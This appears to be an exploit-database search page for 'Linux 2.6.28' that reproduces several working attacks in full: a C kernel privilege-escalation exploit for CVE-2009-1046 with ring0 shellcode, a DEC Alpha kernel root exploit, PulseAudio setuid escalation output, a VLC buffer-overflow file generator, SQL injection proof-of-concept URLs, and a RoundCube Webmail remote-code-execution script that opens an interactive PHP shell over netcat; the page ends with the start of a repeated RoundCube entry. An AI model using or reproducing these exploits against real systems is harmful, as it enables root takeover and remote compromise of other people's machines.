Linux 2.6.28
Search result for 'Linux 2.6.28'
(0.0376348495483 seconds)
1 pages :
1
sgrakkyu/Linux Kernel <= 2.6.28.3 set_selection() UTF-8 Off By One Local Exploit ( linux)
/* CVE-2009-1046 Virtual Console UTF-8 set_selection() off-by-one(two) Memory Corruption
* Linux Kernel <= 2.6.28.3
*
* coded by: sgrakkyu <at> antifork.org
* http://kernelbof.blogspot.com/2009/07/even-when-one-byte-matters.html
*
* Dedicated to all people talking nonsense about non exploitability of kernel heap off-by-one overflow
*
* NOTE-1: you need a virtual console attached to the standard output (stdout)
* - physical login
* - ptrace() against some process with the same uid already attached to a VC
* - remote management ..
*
* NOTE-2: UTF-8 character used is: U+253C - it seems to be supported in most standard console fonts
* but if it's _not_: change it (and change respectively STREAM_ZERO and STREAM_ZERO_ALT defines)
* If you use an unsupported character expect some sort of recursive fatal ooops:)
*
* Designed to be built as x86-64 binary only (SLUB ONLY)
* SCTP stack has to be available
*
* Tested on target:
* Ubuntu 8.04 x86_64 (2.6.24_16-23 generic/server)
* Ubuntu 8.10 x86_64 (2.6.27_7-10 genric/server)
* Fedora Core 10 x86_64 (default installed kernel - without selinux)
*
*/
#define _GNU_SOURCE
#include <stdio.h>
#include <sched.h>
#include <errno.h>
#include <netinet/in.h>
#include <netinet/sctp.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <stdlib.h>
#include <string.h>
#include <linux/tiocl.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/mman.h>
#include <sched.h>
#include <unistd.h>
#include <fcntl.h>
#ifndef __x86_64__
#error "Architecture Unsupported"
#error "This code was written for x86-64 target and has to be built as x86-64 binary"
#else
#ifndef __u8
#define __u8 uint8_t
#endif
#ifndef __u16
#define __u16 uint16_t
#endif
#ifndef __u32
#define __u32 uint32_t
#endif
#ifndef __u64
#define __u64 uint64_t
#endif
#define STREAM_ZERO 10
#define STREAM_ZERO_ALT 12
#define SCTP_STREAM 22
#define STACK_SIZE 0x1000
#define PAGE_SIZE 0x1000
#define STRUCT_PAGE 0x0000000000000000
#define STRUCT_PAGE_ALT 0x0000000100000000
#define CODE_PAGE 0x0000000000010000
#define LOCALHOST "127.0.0.1"
#define KMALLOC "kmalloc-128"
#define TIMER_LIST_FOPS "timer_list_fops"
#define __msg_f(format, args...) \
do { fprintf(stdout, format, ## args); } while(0)
#define __msg(msg) \
do { fprintf(stdout, "%s", msg); } while(0)
#define __fatal_errno(msg) \
do { perror(msg); __free_stuff(); exit(1); } while(0)
#define __fatal(msg) \
do { fprintf(stderr, msg); __free_stuff(); exit(1); } while(0)
#define CJUMP_OFF 13
char ring0[]=
"\x57" // push %rdi
"\x50" // push %rax
"\x65\x48\x8b\x3c\x25\x00\x00\x00\x00" // mov %gs:0x0,%rdi
"\x48\xb8\x41\x41\x41\x41\x41\x41\x41\x41" // mov xxx, %rax
"\xff\xd0" // callq *%rax
"\x58" // pop %rax
"\x5f" // pop %rdi
"\xc3"; // retq
/* conn struct */
static __u16 srvport;
struct sockaddr_in server_s;
static struct sockaddr_in caddr;
/* some fds.. */
static int g_array[10];
static int fd_zmap_srv=-1;
static int kmalloc_fd=-1;
static int unsafe_fd[4] = {-1,-1,-1,-1};
/* misc */
static int dorec = 0, cankill=1, highpage=0;
static char cstack[STACK_SIZE*2];
static __u16 zstream=STREAM_ZERO;
static __u32 uid,gid;
static __u64 fops;
static pid_t child=0;
static char symbuf[20000];
static void __free_stuff()
{
int i;
for(i=3; i<2048; i++)
{
if((unsafe_fd[0] == i || unsafe_fd[1] == i ||
unsafe_fd[2] == i || unsafe_fd[3] == i))
continue;
close(i);
}
}
static void bindcpu()
{
cpu_set_t set;
CPU_ZERO(&set);
CPU_SET(0, &set);
if(sched_setaffinity(0, sizeof(cpu_set_t), &set) < 0)
__fatal_errno("setaffinity");
}
/* parse functions are not bof-free:) */
static __u64 get_fops_addr()
{
FILE* stream;
char fbuf[256];
char addr[32];
stream = fopen("/proc/kallsyms", "r");
if(stream < 0)
__fatal_errno("open: kallsyms");
memset(fbuf, 0x00, sizeof(fbuf));
while(fgets(fbuf, 256, stream) > 0)
{
char *p = fbuf;
char *a = addr;
memset(addr, 0x00, sizeof(addr));
fbuf[strlen(fbuf)-1] = 0;
while(*p != ' ')
*a++ = *p++;
p += 3;
if(!strcmp(p, TIMER_LIST_FOPS))
return strtoul(addr, NULL, 16);
}
return 0;
}
static int get_total_object(int fd)
{
char name[32];
char used[32];
char total[32];
char *ptr[] = {name, used, total};
int ret,i,toread=sizeof(symbuf)-1;
char *p = symbuf;
lseek(fd, 0, SEEK_SET);
memset(symbuf, 0x00, sizeof(symbuf));
while( (ret = read(fd, p, toread)) > 0)
{
p += ret;
toread -= ret;
}
p = symbuf;
do
{
for(i=0; i<sizeof(ptr)/sizeof(void*); i++)
{
char *d = ptr[i];
while(*p != ' ')
*d++ = *p++;
*d = 0;
while(*p == ' ')
p++;
}
while(*p++ != '\n');
if(!strcmp(KMALLOC, name))
return atoi(total);
} while(*p != 0);
return 0;
}
static void ring0c(void* t)
{
int i;
__u32 *p = t;
for(i=0; i<1100; i++,p++)
{
if(p[0] == uid && p[1] == uid && p[2] == uid && p[3] == uid &&
p[4] == gid && p[5] == gid && p[6] == gid && p[7] == gid)
{
p[0] = p[1] = p[2] = p[3] = 0;
p[4] = p[5] = p[6] = p[7] = 0;
/* dont care about caps */
break;
}
}
}
static int get_kmalloc_fd()
{
int fd;
fd = open("/proc/slabinfo", O_RDONLY);
if(fd < 0)
__fatal_errno("open: slabinfo");
return fd;
}
static int write_sctp(int fd, struct sockaddr_in *s, int channel)
{
int ret;
ret = sctp_sendmsg(fd, "a", 1,
(struct sockaddr *)s, sizeof(struct sockaddr_in),
0, 0, channel, 0 ,0);
return ret;
}
static void set_sctp_sock_opt(int fd, __u16 in, __u16 out)
{
struct sctp_initmsg msg;
int val=1;
socklen_t len_sctp = sizeof(struct sctp_initmsg);
getsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, &len_sctp);
msg.sinit_num_ostreams=out;
msg.sinit_max_instreams=in;
setsockopt(fd, SOL_SCTP, SCTP_INITMSG, &msg, len_sctp);
setsockopt(fd, SOL_SCTP, SCTP_NODELAY, (char*)&val, sizeof(val));
}
static int create_and_init(void)
{
int fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
if(fd < 0)
__fatal_errno("socket: sctp");
set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);
return fd;
}
static void connect_peer(int fd, struct sockaddr_in *s)
{
int ret;
ret = connect(fd, (struct sockaddr *)s, sizeof(struct sockaddr_in));
if(ret < 0)
__fatal_errno("connect: one peer");
}
static void conn_and_write(int fd, struct sockaddr_in *s, __u16 stream)
{
connect_peer(fd,s);
write_sctp(fd, s, stream);
}
static int clone_thread(void*useless)
{
int o = 1;
int c=0,idx=0;
int fd, ret;
struct sockaddr_in tmp;
socklen_t len;
bindcpu();
server_s.sin_family = PF_INET;
server_s.sin_port = htons(srvport);
server_s.sin_addr.s_addr = inet_addr(LOCALHOST);
fd = socket(PF_INET, SOCK_STREAM, IPPROTO_SCTP);
if(fd < 0)
return -1;
set_sctp_sock_opt(fd, SCTP_STREAM, SCTP_STREAM);
setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, (char *)&o, sizeof(o));
ret = bind(fd, (struct sockaddr *)&server_s, sizeof(struct sockaddr_in));
if(ret < 0)
return -1;
ret = listen(fd, 100);
if(ret < 0)
return -1;
len = sizeof(struct sockaddr_in);
while((ret = accept(fd, (struct sockaddr *)&tmp, &len)) >= 0)
{
if(dorec != 0 && c >= dorec && idx < 10)
{
g_array[idx] = ret;
if(idx==9)
{
fd_zmap_srv = ret;
caddr = tmp;
break;
}
idx++;
}
c++;
write_sctp(ret, &tmp, zstream);
}
sleep(1);
return 0;
}
static int do_mmap(unsigned long base, int npages)
{
void*addr = mmap((void*)base, PAGE_SIZE*npages,
PROT_READ|PROT_WRITE|PROT_EXEC,
MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);
if(MAP_FAILED == addr)
return -1;
memset(addr, 0x00, PAGE_SIZE*npages);
return 0;
}
pid_t start_listener()
{
pid_t pid;
pid = clone(clone_thread, cstack+STACK_SIZE-8,
CLONE_VM|CLONE_FILES|SIGCHLD, NULL);
return pid;
}
static void do_socks(struct sockaddr_in *s, __u16 stream)
{
int i,fd;
int n_objs = get_total_object(kmalloc_fd), tmp_n_objs;
int next=8;
for(i=0; next != 0; i++)
{
fd = create_and_init();
tmp_n_objs = get_total_object(kmalloc_fd);
if(!dorec && tmp_n_objs != n_objs)
dorec=i;
conn_and_write(fd, s, stream);
if(dorec)
next--;
}
}
static void clr(int fd)
{
/* use termcap instead..*/
write(fd, "\33[H\33[J", 6);
}
static char tiobuffer[2048];
void alloc_tioclinux()
{
int i;
char out[128*3];
/* Unicode Character 'BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL' (U+253C) */
char utf8[3] = { 0xE2, 0x94, 0xBC };
//char utf8[3] = { 0xE2, 0x80, 0xBC };
struct tiocl_selection *sel;
char *t;
void *v = malloc(sizeof(struct tiocl_selection) + 1);
t = (char*)v;
sel = (struct tiocl_selection *)(t+1);
memset(out, 0x41, sizeof(out));
for(i=0; i<128; i++)
{
tiobuffer[(i*3)]=utf8[0];
tiobuffer[(i*3)+1]=utf8[1];
tiobuffer[(i*3)+2]=utf8[2];
}
*t = TIOCL_SETSEL;
sel->xs = 1;
sel->ys = 1;
sel->xe = 43;
//sel->xe = 42; /* no overflow */
sel->ye = 1;
write(1, tiobuffer, sizeof(tiobuffer));
if(ioctl(1, TIOCLINUX, v) < 0)
__fatal("[!!] Unable to call TIOCLINUX ioctl(), need stdout to be on a virtual console\n");
}
static void migrate_evil_fd()
{
int i;
pid_t child;
__msg("[**] Migrate evil unsafe fds to child process..\n");
child = fork();
if(!child)
{
/* preserve evil fds */
setsid();
if(!cankill) /* cant die .. */
while(1)
sleep(1);
else
{
sleep(10); /* wait execve() before */
for(i=0; i<4; i++)
close(unsafe_fd[i]);
exit(1);
}
}
else
{
if(!cankill)
__msg_f("[**] Child process %d _MUST_ NOT die ... keep it alive:)\n", child);
}
}
static void trigger_fault()
{
char *argv[]={"/bin/sh", NULL};
int fd,i;
fd = open("/proc/timer_list", O_RDONLY);
if(fd >= 0)
{
ioctl(fd, 0, 0);
__free_stuff();
migrate_evil_fd();
for(i=0; i<4; i++)
close(unsafe_fd[i]);
if(!getuid())
{
__msg("[**] Got root!\n");
execve("/bin/sh", argv, NULL);
}
}
else
{
__msg("[**] Cannot open /proc/timer_list");
__free_stuff();
}
}
static void overwrite_fops( int sender,
struct sockaddr_in *to_receiver,
int receiver)
{
char *p = NULL;
if(!highpage)
p++;
else
p = (void*)STRUCT_PAGE_ALT;
__u64 *uip = (__u64*)p;
*uip = fops;
write_sctp(sender, to_receiver, 1);
sleep(1);
trigger_fault();
}
static __u16 get_port()
{
__u16 r = (__u16)getpid();
if(r <= 0x400)
r+=0x400;
return r;
}
int main(int argc, char *argv[])
{
int peerx, peery,i;
__u64 *patch;
srvport = get_port();
uid=getuid();
gid=getgid();
fops=get_fops_addr() + 64;
if(!fops)
{
__msg("[!!] Unable to locate symbols...\n");
return 1;
}
__msg_f("[**] Patching ring0 shellcode with userspace addr: %p\n", ring0c);
patch = (__u64*)(ring0 + CJUMP_OFF);
*patch = (__u64)ring0c;
__msg_f("[**] Using port: %d\n", srvport);
__msg("[**] Getting slab info...\n");
kmalloc_fd = get_kmalloc_fd();
if(!get_total_object(kmalloc_fd))
__fatal("[!!] Only SLUB allocator supported\n");
__msg("[**] Mapping Segments...\n");
__msg("[**] Trying mapping safe page...");
if(do_mmap(STRUCT_PAGE, 1) < 0)
{
__msg("Page Protection Present (Unable to Map Safe Page)\n");
__msg("[**] Mapping High Address Page (dont kill placeholder child)\n");
if(do_mmap(STRUCT_PAGE_ALT, 1) < 0)
__fatal_errno("mmap");
cankill=0; /* dont kill child owning unsafe fds.. */
highpage=1; /* ssnmap in higher pages */
zstream=STREAM_ZERO_ALT;
}
else
__msg("Done\n");
__msg("[**] Mapping Code Page... ");
if(do_mmap(CODE_PAGE, 1) < 0)
__fatal_errno("mmap");
else
__msg("Done\n");
memcpy((void*)CODE_PAGE, ring0, sizeof(ring0));
__msg("[**] Binding on CPU 0\n");
bindcpu();
__msg("[**] Start Server Thread..\n");
child = start_listener();
sleep(3);
do_socks(&server_s, zstream);
for(i=0; i<7; i++)
{
close(g_array[8-1-i]);
}
clr(1);
alloc_tioclinux(); // trigger overflow
peerx = create_and_init();
connect_peer(peerx, &server_s);
peery = create_and_init();
connect_peer(peery, &server_s);
sleep(1);
unsafe_fd[0] = peerx;
unsafe_fd[1] = g_array[8];
unsafe_fd[2] = peery;
unsafe_fd[3] = g_array[9];
__msg("\n");
__msg_f("[**] Umapped end-to-end fd: %d\n", fd_zmap_srv);
__msg_f("[**] Unsafe fd: ( ");
for(i=0; i<4; i++)
__msg_f("%d ", unsafe_fd[i]);
__msg(")\n");
__msg("[**] Hijacking fops...\n");
overwrite_fops(fd_zmap_srv, &caddr, peery);
/* if u get here.. something nasty happens...may crash..*/
__free_stuff();
__msg("[**] Exploit failed.. freezing process\n");
kill(getpid(), SIGSTOP);
return 0;
}
#endif
// milw0rm.com [2009-07-09]
n/a/PulseAudio (setuid) Priv. Escalation Exploit (ubu/9.04)(slack/12.2.0) ( linux)
PulseAudio setuid Local Privilege Escalation Vulnerability http://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- Put files in /tmp/pulseaudio-exp (or change config.h). Must be on same fs as the pulseaudio binary. Goes faster if you already have a pulseaudio running ? :p Tested with success on Ubuntu 9.04 (x86-64) and slackware 12.2.0 (x86) Ubuntu: ------------------------------------ $ ./c.sh $ ./pulseaudio-exp Please wait. [*] Seems we are uid = 0 and gid = 0 [*] mv /tmp/pulseaudio-exp/shell /sbin/axx [*] chown root.root /sbin/axx [*] chmod 4755 /sbin/axx Try: /sbin/axx /bin/sh $ /sbin/axx /bin/sh # id uid=0(root) gid=0(root) groups=4(adm),20(dialout),24(cdrom),46(plugdev),106(lpadmin),121(adm in),122(sambashare) # uname -a Linux ubuntu 2.6.28-13-generic #45-Ubuntu SMP Tue Jun 30 22:12:12 UTC 2009 x86_64 GNU/Linux ------------------------------------ Slackware ------------------------------------ $ ./c.sh $ ./pulseaudio-exp Please wait. [*] Seems we are uid = 0 and gid = 0 [*] mv /tmp/pulseaudio-exp/shell /sbin/axx [*] chown root.root /sbin/axx [*] chmod 4755 /sbin/axx Try: /sbin/axx /bin/sh $ /sbin/axx /bin/sh sh-3.1# id uid=0(root) gid=0(root) groups=17(audio),100(users),104(pulse-rt) sh-3.1# uname -a Linux slackware 2.6.27.7-smp #2 SMP Thu Nov 20 22:32:43 CST 2008 i686 Intel(R) Pentium(R) Dual CPU T3400 @ 2.16GHz GenuineIntel GNU/Linux ------------------------------------ download: http://exploit-db.com/sploits/2009-pulseaudio-exp.tar.gz # milw0rm.com [2009-07-20]
Dan Rosenberg/DEC Alpha Linux <= 3.0 Local Root Exploit ( linux)
/*
* DEC Alpha Linux <= 3.0 local root exploit
* by Dan Rosenberg (@djrbliss)
*
* Usage:
* $ gcc alpha-omega.c -o alpha-omega
* $ ./alpha-omega
*
* Notes:
* -Payload specific to <= 2.6.28 (no cred struct, modify as needed)
* -Socket trigger tested on 2.6.28 (adjust offset as needed)
* -INET_DIAG parsing code borrowed from netstat
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/socket.h>
#include <linux/netlink.h>
#include <linux/inet_diag.h>
#include <string.h>
#include <sys/mman.h>
#include <errno.h>
#include <netinet/in.h>
#define SYS_osf_wait4 7
#define SOCK_OFFSET 552 /* Offset of sk_destruct fptr in sock
* struct, change for your kernel */
#define PAGE_SIZE 8192 /* DEC alpha page size is 8K */
#define KERNEL_BASE 0xfffffc0000000000 /* DEC alpha PAGE_OFFSET */
#define TASK_STRUCT_OFFSET 64 /* task_struct offset in thread_info */
#define PAYLOAD 0x20000
#define PORT 31337
static int uid, gid;
/* Writes (0xff & value) << 8 to addr */
void kernel_write(unsigned long addr, int value)
{
int pid = fork();
if (pid) {
/* wait4 backdoor number two? ;) */
syscall(SYS_osf_wait4, pid, (int *)addr, 0, 1);
return;
} else {
exit(value);
}
}
/* Get the INET_DIAG cookie for our socket, which contains the low 32 bits
* of the sock struct address */
unsigned int get_cookie(unsigned int port)
{
int fd;
struct sockaddr_nl nladdr;
struct {
struct nlmsghdr nlh;
struct inet_diag_req r;
} req;
struct msghdr msg;
char buf[8192];
struct iovec iov;
struct inet_diag_msg *r;
if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_INET_DIAG)) < 0)
return -1;
memset(&nladdr, 0, sizeof(nladdr));
nladdr.nl_family = AF_NETLINK;
req.nlh.nlmsg_len = sizeof(req);
req.nlh.nlmsg_type = TCPDIAG_GETSOCK;
req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST;
req.nlh.nlmsg_pid = 0;
req.nlh.nlmsg_seq = 123456;
memset(&req.r, 0, sizeof(req.r));
req.r.idiag_family = AF_INET;
req.r.idiag_states = 0xfff;
req.r.idiag_ext = 0;
iov.iov_base = &req;
iov.iov_len = sizeof(req);
msg = (struct msghdr) {
.msg_name = (void*)&nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
if (sendmsg(fd, &msg, 0) < 0) {
close(fd);
return -1;
}
iov.iov_base = buf;
iov.iov_len = sizeof(buf);
while (1) {
int status;
struct nlmsghdr *h;
msg = (struct msghdr) {
(void*)&nladdr, sizeof(nladdr),
&iov, 1, NULL, 0, 0
};
status = recvmsg(fd, &msg, 0);
if (status < 0) {
if (errno == EINTR)
continue;
close(fd);
return -1;
}
if (status == 0) {
close(fd);
return -1;
}
h = (struct nlmsghdr*)buf;
while (NLMSG_OK(h, status)) {
if (h->nlmsg_seq == 123456) {
if (h->nlmsg_type == NLMSG_DONE) {
close(fd);
return -1;
}
if (h->nlmsg_type == NLMSG_ERROR) {
close(fd);
return -1;
}
r = NLMSG_DATA(h);
if (r->idiag_family == AF_INET &&
ntohs(r->id.idiag_sport) == port)
return r->id.idiag_cookie[0];
}
h = NLMSG_NEXT(h, status);
}
}
close(fd);
return -1;
}
/* Get the address of the sock struct for our socket */
unsigned long get_sock_addr(unsigned int port)
{
FILE *f;
char buf[1024], path[512];
unsigned int testport, cookie, a;
unsigned long addr, b;
f = fopen("/proc/net/tcp", "r");
if (f < 0) {
printf("[*] Failed to open /proc/net/tcp\n");
return 0;
}
while (fgets(buf, 1024, f)) {
sscanf(buf, "%4d: %08X:%04X %08X:%04X %02X %08X:%08X "
"%02X:%08lX %08X %5d %8d %lu %d %p %lu %lu %u %u "
"%d\n",
&a, &a, &testport, &a, &a, &a, &a, &a, &a, &b,
&a, &a, &a, &b, &a, (void **)&addr, &b, &b, &a, &a,
&a);
if (testport == port) {
/* If kptr_restrict is on... */
if (!addr) {
cookie = get_cookie(port);
addr = (unsigned long)cookie + KERNEL_BASE;
}
fclose(f);
return addr;
}
}
fclose(f);
return 0;
}
void getroot()
{
int i;
/* Alpha has 16K stacks */
unsigned long thread_info = (unsigned long)&i & ~0x3fff;
unsigned long task_struct = *(unsigned long *)(thread_info +
TASK_STRUCT_OFFSET);
int *j = (int *)task_struct;
for (i = 0; i < 1000; i++, j++) {
if (j[0] == uid && j[1] == uid && j[2] == uid && j[3] == uid &&
j[4] == gid && j[5] == gid && j[6] == gid && j[7] == gid) {
/* uid, euid, suid, fsuid */
j[0] = j[1] = j[2] = j[3] = 0;
/* gid, egid, sgid, fsgid */
j[4] = j[5] = j[6] = j[7] = 0;
/* caps */
j[10] = j[11] = 0xffffffff;
j[12] = j[13] = 0xffffffff;
j[14] = j[15] = 0xffffffff;
break;
}
}
}
void trampoline()
{
asm volatile( "mov %0, $0\n"
"ldq $27, 0($0)\n"
"jsr $26, ($27)\n"
: : "r"(PAYLOAD));
}
int main(int argc, char * argv[])
{
unsigned long target, *payload;
void *landing;
int sock;
struct sockaddr_in addr;
size_t len;
uid = getuid();
gid = getgid();
printf("[*] Opening TCP socket...\n");
sock = socket(AF_INET, SOCK_STREAM, 0);
if (sock < 0) {
printf("[*] Failed to open TCP socket.\n");
return -1;
}
memset(&addr, 0, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(PORT);
addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sock, (struct sockaddr *)&addr, sizeof(addr)) != 0) {
printf("[*] Failed to bind TCP socket.\n");
return -1;
}
/* Our socket won't appear in /proc/net/tcp unless it's listening */
if (listen(sock, 1)) {
printf("[*] Failed to listen on TCP socket.\n");
return -1;
}
printf("[*] Getting socket address from INET_DIAG...\n");
target = get_sock_addr(PORT);
if (!target) {
printf("[*] Failed to get socket address.\n");
return -1;
}
printf("[*] Socket address: %lx\n", target);
target += SOCK_OFFSET;
printf("[*] Mapping payload...\n");
landing = mmap((void *)0x10000, PAGE_SIZE, PROT_READ | PROT_WRITE |
PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED,
0, 0);
/* We need to keep the address of our payload at a constant address,
* so we can retrieve it and jump to it in our trampoline. */
payload = (unsigned long *)mmap((void *)PAYLOAD, PAGE_SIZE,
PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE |
MAP_ANONYMOUS | MAP_FIXED, 0, 0);
if (landing == MAP_FAILED || payload == MAP_FAILED) {
printf("[*] Failed to map payload.\n");
return -1;
}
*payload = (unsigned long)&getroot;
memcpy((void *)landing, &trampoline, 256);
printf("[*] Overwriting function pointer at %lx...\n", target);
kernel_write(target, 0);
kernel_write(target + 4, 0);
kernel_write(target + 1, 1);
printf("[*] Triggering payload...\n");
close(sock);
if (getuid()) {
printf("[*] Failed to get root.\n");
return -1;
}
printf("[*] Got root!\n");
execl("/bin/sh", "sh", NULL);
}
Dr_IDE/VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux) ( multiple)
#!/usr/bin/env python
###########################################################################
#
# VLC Media Player <= 1.0.3 RTSP Buffer Overflow PoC (OSX/Linux)
# Found By: Dr_IDE
# Tested On: OSX 10.6.2 (v1.0.3)
# Tested On: Ubuntu 9 [2.6.28-15-generic] (v0.9.9a)
# Tested On: No Go on Windows
#
###########################################################################
header1 = ("<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n")
header1 += ("<playlist version=\"1\" xmlns=\"http://xspf.org/ns/0/\" xmlns:vlc=\"http://www.videolan.org/vlc/playlist/ns/0/\">\n")
header1 += ("\t<title>Playlist</title>\n")
header1 += ("\t<trackList>\n")
header1 += ("\t\t<track>\n")
header1 += ("\t\t\t<location>rtsp://localhost@localhost/foo/#{")
payload = ("\x41" * 2 + "\x42" * 4 + "\x43" * 10000)
header2 = ("}</location>\n");
header2 += ("\t\t\t<extension application=\"http://www.videolan.org/vlc/playlist/0\">\n");
header2 += ("\t\t\t\t<vlc:id>0</vlc:id>\n");
header2 += ("\t\t\t</extension>\n");
header2 += ("\t\t</track>\n");
header2 += ("\t</trackList>\n");
header2 += ("</playlist>\n");
try:
f1 = open("vlc_1.0.X.xspf","w")
f1.write(header1 + payload + header2)
f1.close()
print("\nExploit file created!\n")
except:
print "Error"
#[pocoftheday.blogspot.com]
Sora/Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability ( php)
# Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3) ------------------------------ > Ulisse's Scripts 2.6.1 ladder.php SQL Injection Vulnerability > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ > Google Dork: "In your dreams, script kiddies." # VULNERABILITY DESCRIPTION: Type: SQL Injection Level: 4/5 (CRITICAL) Sora has advised that Ulisse's ladder.php file from Ulisse's Scripts 2.6.1 suffers a remote SQL injection vulnerability in the parameter 'gid'. The database inputs are not properly sanitized. # VULNERABILITY SOLUTION: Sanitize the unsanitized database inputs in the file ladder.php. # Proof of Concept: http://server/ulisse/ladder.php?gid=1'
Sora/Ulisse's Scripts 2.6.1 SQL Injection ( na)
# Exploit Title: Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability # Date: January 6th, 2010 # Author: Sora # Version: 2.6.1 # Tested on: Windows Vista Home Premium and Linux 2.6.28.1 (Backtrack 3) —————————— > Ulisse’s Scripts 2.6.1 ladder.php SQL Injection Vulnerability > Author: Sora > Contact: vhr95zw [at] hotmail [dot] com > Website: http://greyhathackers.wordpress.com/ > Google Dork: “In your dreams, script kiddies.” # VULNERABILITY DESCRIPTION: Type: SQL Injection Level: 4/5 (CRITICAL) Sora has advised that Ulisse’s ladder.php file from Ulisse’s Scripts 2.6.1 suffers a remote SQL injection vulnerability in the parameter ‘gid’. The database inputs are not properly sanitized. # VULNERABILITY SOLUTION: Sanitize the unsanitized database inputs in the file ladder.php. # Proof of Concept: http://www.site.com/ulisse/ladder.php?gid=1′
Ulisse's Scripts version 2.6.1 suffers from a remote SQL injection vulnerability in ladder.php.
Hunger/RoundCube Webmail <= 0.2b Remote Code Execution Exploit ( php)
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =< 0.2-beta'
echo 'html2text.php / preg_replace() / eval bug'
echo -e '\r\nby Hunger <rch2tex@hunger.hu>\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0 <hostname> <deeplink>
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] || [ "$BASE64ENC" = "" ];
then
echo "Required tool(s) missing... (netcat, base64)"
exit 2
fi
USERAGENT="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2)"
MYPAYLOAD="{\${EVAL(BASE64_DECODE(\$_SERVER[HTTP_ACCEPT]))}}"
EVALEDTAG="<b>"
EVALEDTAG=$EVALEDTAG$MYPAYLOAD
EVALEDTAG=$EVALEDTAG"</b>"
PARAMSIZE=54
HOST_NAME=$1
DEEP_LINK=$2
HTTP_PORT=80
HTTPHEADR=""
HTTPHEADR=$HTTPHEADR"POST $DEEP_LINK HTTP/1.0\r\n"
HTTPHEADR=$HTTPHEADR"Host: $HOST_NAME\r\n"
HTTPHEADR=$HTTPHEADR"User-Agent: $USERAGENT\r\n"
HTTPHEADR=$HTTPHEADR"Content-length: $PARAMSIZE\r\n"
HTTPHEADR=$HTTPHEADR"Accept:"
SPLOITCHK='Succeeded! :))'
PHPAYLOAD='echo("'
PHPAYLOAD=$PHPAYLOAD$SPLOITCHK'\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Type PHP functions as shell commands. ;)\r\n'
PHPAYLOAD=$PHPAYLOAD'Use \"exit\" to close session.\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'Good luck and have phun! ;D\r\n\r\n'
PHPAYLOAD=$PHPAYLOAD'")'
HTTPOKMSG="HTTP/1.0 200 OK"
HTTP1KMSG="HTTP/1.1 200 OK"
RETURNCHR=`echo -e "\r\n"`
echo -n "Trying to exploit... "
f=0; until [ "$PHPAYLOAD" = "exit" ]; do
PHPAYLOAD=`echo "$PHPAYLOAD;" |$BASE64ENC --wrap=0`
HTTP_SEND="$HTTPHEADR $PHPAYLOAD\r\n\r\n$EVALEDTAG"
HTTP_BACK=`echo -ne "$HTTP_SEND"|$NETCATEXE $HOST_NAME $HTTP_PORT`
if [ $? != 0 ]; then echo "Connection failed."; exit 3; fi
e=0; l=0; echo "$HTTP_BACK" | while read i; do let l++;
if [ $l = 1 ] && [ "$i" != "$HTTPOKMSG$RETURNCHR" ] \
&& [ "$i" != "$HTTP1KMSG$RETURNCHR" ]; then
echo "Bad Server Response :\\"; exit 4; fi;
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" = "$MYPAYLOAD" ]; then
echo "Target has been patched /o\\"; exit 4; fi
if [ $e = 1 ] && [ $f = 0 ] && [ "$i" != "$SPLOITCHK$RETURNCHR" ]; then
echo -e "Exploitation failed :(("; exit 4; elif
[ "$i" = "$SPLOITCHK$RETURNCHR" ]; then let f++; fi
if [ $e -gt 0 ]; then echo "$i"; fi
if [ "$i" = "$RETURNCHR" ]; then let e++; fi
done
if [ $? != 4 ]; then let f++; echo -ne "PHP> "; else
echo -e "\n\nDump:\n\n$HTTP_BACK"; exit 4; fi;
read PHPAYLOAD
done
# milw0rm.com [2008-12-22]
Hunger/RoundCube Webmail 0.2b Remote Code Execution ( na)
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
